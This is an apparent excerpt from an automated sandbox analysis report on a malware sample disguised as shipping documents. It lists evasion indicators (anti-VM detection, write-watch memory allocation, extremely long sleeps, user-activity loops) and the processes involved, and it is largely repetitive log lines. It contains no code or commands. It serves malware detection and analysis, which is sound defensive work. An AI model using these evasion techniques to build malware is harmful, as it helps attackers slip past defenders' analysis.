Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory allocated: 1AA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory allocated: 3270000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory allocated: 5270000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory allocated: 9B50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory allocated: AB50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory allocated: AD70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory allocated: BD70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory allocated: C820000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory allocated: D820000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory allocated: E820000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory allocated: 1020000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory allocated: 2AF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory allocated: 2940000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory allocated: 8C20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory allocated: 9C20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory allocated: 9E20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory allocated: AE20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory allocated: B910000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory allocated: C910000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory allocated: D910000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599888 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598437 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598218 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597422 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597312 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597203 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597085 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596983 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596859 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596746 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596497 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596387 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596265 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595932 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595687 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595437 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595219 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594344 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594015 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593878 Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599871
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598095
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597972
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595339
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594529
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594176
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594047
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5343 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 393 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6392 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 3164 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 6665 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7292
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe TID: 504 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6704 Thread sleep count: 5343 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6348 Thread sleep count: 393 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5924 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4936 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe TID: 5776 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599888 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598437 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598218 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597422 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597312 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597203 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597085 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596983 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596859 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596746 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596497 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596387 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596265 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595932 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595687 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595437 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595219 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594344 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594015 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593878 Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599871
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598095
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597972
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596469
